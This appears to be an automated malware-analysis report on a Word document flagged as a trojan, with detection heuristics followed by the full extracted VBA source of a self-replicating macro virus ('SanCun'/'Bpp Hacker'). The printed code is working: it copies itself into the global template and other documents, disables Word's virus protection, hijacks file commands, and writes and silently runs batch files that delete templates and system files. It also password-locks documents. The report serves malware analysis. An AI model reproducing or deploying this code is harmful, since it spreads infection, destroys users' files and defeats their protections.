MALICIOUS
Risk Score: 316
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1566.001 Spearphishing Attachment
This document contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close routines, which are indicative of malicious intent. The presence of a Shell() call within the VBA code suggests an attempt to execute arbitrary commands, likely to download and run a second-stage payload. The ClamAV detections further confirm the malicious nature of the file.
Heuristics (7)
- ClamAV: Win.Trojan.Pivis-2 [critical, CLAMAV_DETECTION]
  ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected [medium, 4 related findings, OLE_VBA_MACROS]
  Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]
  Potential Shell call in VBA
  Matched line in script: Shell ("c:\c "), vbHide
- VBA macro-virus self-replication / AV tampering [critical, OLE_VBA_MACRO_VIRUS_REPLICATION]
  VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
  Matched line in script: Options.VirusProtection = False
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]
  AutoOpen macro
  Matched line in script: Sub AutoOpen()
- Auto_Close macro [low, OLE_VBA_AUTOCLOSE]
  Auto_Close macro
  Matched line in script: Sub AutoClose()
- Legacy WordBasic macro-virus markers [high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS]
  OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57664 bytes |

SHA-256: 3e2b8f168755e4f0957131ff11cdc0e873db41f3a12560120261f64b6b714f28
Detection: ClamAV: Doc.Trojan.Bablas-4
Obfuscation or payload: unlikely

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SanCun"
'San I Love You
Const ACENGLAH = "<- This is a ACENGLAH! by SanCun"
Public AD As Object, NT As Object
Sub AutoOpen()
On Error GoTo hapus
Dim NT As Object
Dockenor
Create_Loader
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "SanCun" Then NormInstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "SanCun" Then ActivInstall = True
Next i
If ActivInstall = True And NormInstall = True Then GoTo Label_Exit
If ActivInstall = True And NormInstall = False Then Set Doc = ActiveDocument
If ActivInstall = False And NormInstall = True Then Set Doc = NormalTemplate
Pad = Options.DefaultFilePath(wdDocumentsPath)
ModuleLength = Doc.VBProject.VBComponents("SanCun").CodeModule.CountOfLines
NT.Save
Doc.VBProject.VBComponents("SanCun").Export Pad + ("\Fax.txt")
ActiveDocument.SaveAs fileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
SanCun
Label_Exit:
'CommandBars("Format").Controls("Style...")
If NormInstall = True Then Call Create_Loader
Application.ScreenUpdating = False
Application.DisplayAlerts = wdAlertsAll
Application.EnableCancelKey = wdCancelInterrupt
hapus:
Dockenor
End Sub
Sub Create_Loader()
On Error Resume Next
Options.DefaultFilePath(wdStartupPath) = "C:\Program Files\Microsoft Office\Template"
Options.DefaultFilePath(wdTempFilePath) = "C:\Windows\Cad.Sys"
Pad1 = Options.DefaultFilePath(wdStartupPath)
MyFile = Dir(Pad1 + "\Frieds.dot")
If MyFile = "" Then
Set Adoc = NormalTemplate.OpenAsDocument
With Adoc
.SaveAs fileName:=Pad1 + "\Frieds.dot"
.Close SaveChanges:=wdDoNotSaveChanges
End With
End If
End Sub
Sub SanCun()
On Error Resume Next
Dockenor
Norkedoc
Call sim
Call Create_Loader
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
ActiveDocument.ReadOnlyRecommended = False
If WeekDay(2) Then Call Enjoy
If Month(Now()) = 10 And Day(Now()) = 6 Then Call Enjoy
With Dialogs(wdDialogFileSummaryInfo)
.Author = "CAD Computer"
.Title = "Virus Protection"
.Subject = "For San San"
.Comments = "Virus Protection Password"
.Execute
End With
bodo:
End Sub
Sub FileSave()
On Error Resume Next
Norkedoc
ActiveDocument.Save
SanCun
End Sub
Sub FileClose()
On Error Resume Next
Norkedoc
If ActiveDocument.Saved = False Then ActiveDocument.Save
SanCun
ActiveDocument.Close
End Sub
Sub FileSaveAs()
On Error Resume Next
Norkedoc
SanCun
Dialogs(wdDialogFileSaveAs).Show
End Sub
Sub FileExit()
On Error Resume Next
Norkedoc
SanCun
Call Reg("c:\windows\Reg.bat")
If ActiveDocument.Saved = False Then ActiveDocument.Save
SANSAN
Application.Quit
End Sub
Sub AutoExit()
On Error Resume Next
Norkedoc
'SanCun
SANSAN
End Sub
Sub AutoExec()
On Error GoTo hapus
Norkedoc
Application.EnableCancelKey = wdCancelDisabled
Call Reg("c:\windows\Reg.bat")
Call sim
UnlockComments = True
'Pasword
SanCun
WBF
AddIns.Unload False
WBF
hapus:
Dockenor
End Sub
Sub AutoClose()
On Error Resume Next
Norkedoc
SanCun
End Sub
Sub ToolsMacro()
On Error Resume Next
'SanCun
If System.OperatingSystem = "Windows" Then Call Message 'p5687("C:\start.scr")
'If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
'Call Message
End Sub
Sub FileTemplates()
On Error Resume Next
SanCun
If System.OperatingSystem = "Windows" Then Call Cad 'p5687("C:\start.scr")
'If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
'Call Message
End Sub
Sub ViewVBCode()
Dim Password, Pword
On Error Resume Next
SanCun
If System.OperatingSystem = "Windows" Then Call Cad 'p5687("C:\start.scr")
'If System.OperatingSystem = "Windows" Then Call startv("c:\startv.bat")
Do
'Password = "ACENGLAH"
'Pword = InputBox("Type in your password")
'If Pword <> Password Then
'MsgBox "Sorry, incorrect password"
'End
'End If
Call Cad
Loop
End Sub
Sub Reg(strFile As String)
Dim hFile As Long
Close hFile
On Error Resume Next
hFile = FreeFile
Open strFile For Output Access Write As hFile
Shell ("c:\c "), vbHide
Print #hFile, "@echo off"
Print #hFile, "del c:\progra~1\micros~1\office\startup\*.dot"
Print #hFile, "del c:\progra~1\micros~1\templa~1\*.dot"
Print #hFile, "del c:\windows\*.dot"
Print #hFile, "del Zap.bat"
Print #hFile, "del Reg.bat"
Print #hFile, "del c:\Start.exe"
Print #hFile, "del C:\start.scr"
Print #hFile, "del C:\startv.bat"
Print #hFile, "del C:\Autoexec.bat"
Print #hFile, "del C:\Cacah.hit"
Print #hFile, "del C:\cad.sys"
Close hFile
Shell ("c:\windows\Reg.bat"), vbHide
End Sub
Sub FileOpen()
On Error Resume Next
WBT
If Dialogs(80).Show <> 0 Then
Call AutoOpen
Dockenor
Norkedoc
Call SanCun
WBF
Else
WBF
Call SANSAN
End If
End Sub
Sub Message()
nama1 = " San San "
Nama2 = "San San"
msg1 = "Lagi Ngapainn ??? "
msg2 = "Jangan Ngelamun Yeh.."
msg3 = "Kerjain Tuh Tugasnya Yah.... "
msg4 = "Buat Yang Laen Aku Minta Maaf "
msg1 = "I Love You"
msg2 = " "
msg3 = " This Come From My Heart and Soul"
MsgBox (msg1 + Chr(44) + msg2 + Chr(10) + msg3)
If WeekDay(2) Then MsgBox msg1 + nama1, vbInformation
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Nama2, vbInformation, "???"
End Sub
Sub Enjoy()
nama1 = " San !!!"
Nama2 = "San San"
msg1 = "Lagi Ngapainn ??? "
msg2 = " Jangan Ngelamun Yeh.. "
msg3 = " Kerjain Tuh Tugasnya .... "
msg4 = "Buat Yang Laen Aku Minta Maaf "
msg5 = "Kamu Juga "
msg6 = " Kok Ikut-Ikutan Bengong ? "
msg7 = "Dasar Dompok Luh...Ah.."
MsgBox (msg1 + Chr(10) + msg2 + Chr(10) + msg3)
Rem If WeekDay(2) Then MsgBox msg5 + nama1 + Chr(10) + msg6 + Chr(10) + msg3 + Chr(10) + msg7 + nama1 + Chr(10) + msg4, vbInformation
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Nama2, vbInformation, "???"
End Sub
Function Dockenor()
On Error GoTo Erw1
NorOk = False
WBT
Set AD = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Erh1a
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NMacr = NormalTemplate.VBProject.VBComponents(i).Name
If NMacr = "SanCun" Then NorOk = True
If (NMacr <> "SanCun") And (NMacr <> "ThisDocument") Then
MsgBox ("Normal Template Anda Terkena Virus Macro = " + NMacr + Chr(13) + "Makro akan dihapus dan anda harap enunggu Sejenak"), vbInformation, "SANSAN"
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=NMacr, Object:=wdOrganizerObjectProjectItems
End If
Next i
Erh1a:
If NorOk = False Then
On Error GoTo Erh1
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:= _
"SanCun", Object:=wdOrganizerObjectProjectItems
Templates(NormalTemplate.FullName).Save
NormalTemplate.Application.Visible = False
Erh1:
End If
Erw1:
End Function
Function Norkedoc()
On Error GoTo Erw2
DokSave = 0
Dokok = False
Set AD = ActiveDocument
Set NT = NormalTemplate
On Error GoTo Erh2a
For i = 1 To AD.VBProject.VBComponents.Count
NMacr = AD.VBProject.VBComponents(i).Name
If NMacr = "SanCun" Then Dokok = True
'NMacr = NT.VBProject.VBComponents(i).Name
'If NMacr = "SanCun" Then Dokok = True
If (NMacr <> "SanCun") And _
(NMacr <> "ThisDocument") And (NMacr <> "Reference to Normal") Then
MsgBox ("Documen Anda Terkena Virus Macro = " + NMacr + Chr(13) + "Virus Makro akan dihapus dan anda harap tunggu Sejenak"), vbInformation, "SANSAN"
Application.OrganizerDelete Source:=AD.FullName, _
Name:=NMacr, Object:=wdOrganizerObjectProjectItems
End If
Next i
Erh2a:
If Dokok = False Then
On Error GoTo Erh2
Application.OrganizerCopy Source:=NT.FullName, _
Destination:=AD.FullName, Name:= _
"SanCun", Object:=wdOrganizerObjectProjectItems
ActiveDocument.ReadOnlyRecommended = False
ActiveDocument.Save
Erh2:
End If
Erw2:
End Function
Function WBT()
WordBasic.DisableAutoMacros True
End Function
Function WBF()
WordBasic.DisableAutoMacros False
End Function
Function sim()
f56879025 = GetAttr(NormalTemplate.FullName)
Application.VBE.ActiveVBProject.VBComponents("SanCun").Export "c:\windows\Cad.sys"
If f56879025 = vbReadOnly Then GoTo bodo
If f56879025 = vbReadOnly + vbArchive Then GoTo bodo
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(i).Name = "SanCun" Then xxx902578112 = True
Next i
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(i).Name = "SanCun" Then mmf78116 = True
Next i
If xxx902578112 = True And mmf78116 = False Then Set o7811902511 = NormalTemplate.VBProject.VBComponents
If xxx902578112 = False And mmf78116 = True Then Set o7811902511 = ActiveDocument.VBProject.VBComponents
o7811902511.Import "c:\windows\Cad.sys"
If activeinst = False Then ActiveDocument.SaveAs fileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
If mmf78116 = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
bodo:
End Function
Sub Pasword()
'If ActiveDocument = AD Then
With ActiveDocument
.ReadOnlyRecommended = False
.EmbedTrueTypeFonts = False
.SaveFormsData = False
.SaveSubsetFonts = False
.Password = "SANSAN"
.WritePassword = "SANSAN"
End With
Application.DefaultSaveFormat = "SANSAN"
ActiveDocument.SaveAs fileName:=ActiveDocument.FullName, FileFormat:=wdAutoFormat, _
LockComments:=False, Password:="SANSAN", AddToRecentFiles:=True, _
WritePassword:="SANSAN", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
False
'Else
'With ActiveDocument
'.ReadOnlyRecommended = False
'.EmbedTrueTypeFonts = False
'.SaveFormsData = False
'.SaveSubsetFonts = False
'.Password = "SANSAN"
'.WritePassword = "SANSAN"
'End With
'Application.DefaultSaveFormat = "SANSAN"
'ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatTemplate, _
'LockComments:=False, Password:="SANSAN", AddToRecentFiles:=True, _
'WritePassword:="SANSAN", ReadOnlyRecommended:=False, EmbedTrueTypeFonts:=False, _
' SaveNativePictureFormat:=False, SaveFormsData:=False, SaveAsAOCELetter:= _
'False
'End If
End Sub
Sub ShowMessage()
H = Time
If (WeekDay(Date) = vbFriday Or WeekDay(Date) = vbSunday) And Time < TimeValue("21:00:00") Then
For i = 1 To 100
Beep
Next i
H = MsgBox("Terimakasih buat dosenku yang amat sangat " & Chr(34) & _
"bijaksana" & Chr(34) & "," & Chr(13) & "yang telah memberiku nilai JELEK. Saya merasa bangga " & Chr(13) & _
"dan sungguh-sungguh bangga terhadap dosenku itu." & Chr(13) & _
"Sekali lagi saya ucapkan terimakasih!." & Chr(13) & Chr(13) & "Semoga mereka tetap di STIKI." & _
Chr(13) & "(buat teman-teman, ma'af mengganggu.)", vbOKOnly + vbExclamation, "Ucapan Terimakasih")
End If
End Sub
Sub Bablas()
Options.SaveNormalPrompt = True
Options.VirusProtection = True
Options.SavePropertiesPrompt = True
End Sub
Sub HelpAbout()
H = MsgBox("Qun katawon walataqun kalaler." & Chr(13) & Chr(13) & _
"I LOVE SOMETHING ERROR !", vbOKOnly + vbExclamation, "Bpp Hacker")
End Sub
Sub ToolsOptions()
Options.SaveNormalPrompt = False
Options.SavePropertiesPrompt = False
Options.VirusProtection = False
Dialogs(wdDialogToolsOptions).Show
Bablas
End Sub
Sub ChangeCap()
On Error Resume Next
Application.Caption = "Bpp Hacker is now activating "
ActiveWindow.Caption = "(I Don't mean to disturb.)"
End Sub
Sub RestoreCap()
On Error Resume Next
Application.Caption = "Microsoft Word"
ActiveWindow.Caption = ActiveDocument.Name
End Sub
Sub OpenMyMacro()
If InputBox("Enter password", "Bpp Hacker") = "azizoke" Then Application.ShowVisualBasicEditor = True
End Sub
Sub SikatDocument()
Dim DocOk As Boolean
DocOk = False
For Each Obj In ActiveDocument.VBProject.VBComponents
If Obj.Name = "BPPHCK" Then DocOk = True
If Obj.Name <> "BPPHCK" And Obj.Name <> "ThisDocument" Then
Application.StatusBar = "Deleting " + Obj.Name + _
" Macro in " + ActiveDocument.Name + "..."
Application.OrganizerDelete Source:=ActiveDocument.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
If DocOk = False Then
Application.StatusBar = "Copying Bpp Hacker From Normal Template to " _
+ ActiveDocument.Name + "..."
Application.OrganizerCopy Source:=NormalTemplate.FullName, _
Destination:=ActiveDocument, Name:="BPPHCK", Object:=wdOrganizerObjectProjectItems
End If
End Sub
Sub SikatTemplate()
Dim NorOk As Boolean
NorOk = False
For Each Obj In NormalTemplate.VBProject.VBComponents
If Obj.Name = "BPPHCK" Then NorOk = True
If Obj.Name <> "BPPHCK" And Obj.Name <> "ThisDocument" Then
Application.StatusBar = "Deleting " + Obj.Name + _
" Macro in Normal Template..."
Application.OrganizerDelete Source:=NormalTemplate.FullName, _
Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
End If
Next Obj
If NorOk = False Then
Application.StatusBar = "Copying Bpp Hacker From " + ActiveDocument.Name + _
" to Normal Template..."
Application.OrganizerCopy Source:=ActiveDocument.FullName, _
Destination:=NormalTemplate.FullName, Name:="BPPHCK", Object:=wdOrganizerObjectProjectItems
Application.DisplayRecentFiles = False
Application.DisplayRecentFiles = True
End If
ChangeCap
WordBasic.DisableAutoMacros False
On Error Resume Next
If Dialogs(wdDialogFileOpen).Show <> 0 Then
SikatDocument
ActiveDocument.Save
End If
RestoreCap
WordBasic.DisableAutoMacros True
Bablas
ChangeCap
SikatTemplate
On Error Resume Next
NormalTemplate.Save
RestoreCap
SikatDocument
AutoClose
If ActiveDocument.Saved = False Then
SikatDocument
SikatTemplate
On Error Resume Next
ActiveDocument.Save
ActiveDocument.Saved = True
End If
End Sub
Sub Ancurin()
C = Documents.Count
If C <> 0 Then
Dockenor.SikatDocument
WordBasic.DisableAutoMacros True
On Error Resume Next
If ActiveDocument.Name <> "Document1" Then ActiveDocument.Save
Else: Application.OnTime Now + TimeValue("00:00:07"), "Normal.BPPHCK.Ancurin"
End If
End Sub
Sub SANSAN()
nama1 = " San San "
Nama2 = "San San"
msg1 = "Lagi Ngapainn ??? "
msg2 = "Jangan Ngelamun Yeh.."
msg3 = "Kerjain Tuh Tugasnya Yah.... "
msg4 = "Buat Yang Laen Aku Minta Maaf "
msg1 = "I Love You"
msg2 = " "
msg3 = " This Come From My Heart and Soul"
msg4 = " (Cintaku Negeriku)"
MsgBox msg1 + Chr(44) + msg2 + Chr(13) + msg3 + Chr(13) + msg2 + Chr(10) + msg4, vbInformation, "Cun..."
If WeekDay(2) Then MsgBox msg1 + nama1, vbInformation, "Cun..."
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Nama2 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Nama2, vbInformation, "SANSAN"
End Sub
Sub Cad()
nama1 = " San San "
msg1 = "Mau Ngapainn Elu Tuh ??? "
msg2 = "Mau Coba-coba Nganggu Yach..."
msg3 = "Kerjain Tuh Tugasnya Yah.... "
msg4 = "Masih Mau Coba-coba Nih ?"
msg5 = "Penasaran Yach Omm....?"
msg6 = "Boleh dah dicoba !!!"
MsgBox (msg1 + Chr(44) + msg2 + Chr(10) + msg3), vbInformation, "SANSAN"
If WeekDay(2) Then MsgBox msg4 + Chr(10) + msg5 + Chr(10) + msg6, vbInformation, "SANSAN"
If Month(Now()) = 10 And Day(Now()) = 6 Then MsgBox msg1 + Chr(10) + msg2 + Chr(10) + msg3 + Chr(10) + msg4 + Chr(10) + msg5 + Chr(10) + msg6, vbInformation, "SANSAN"
Do
SANSAN
Loop
End Sub
' Processing file: /tmp/qstore_zupm2jmu
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/SanCun - 27702 bytes
…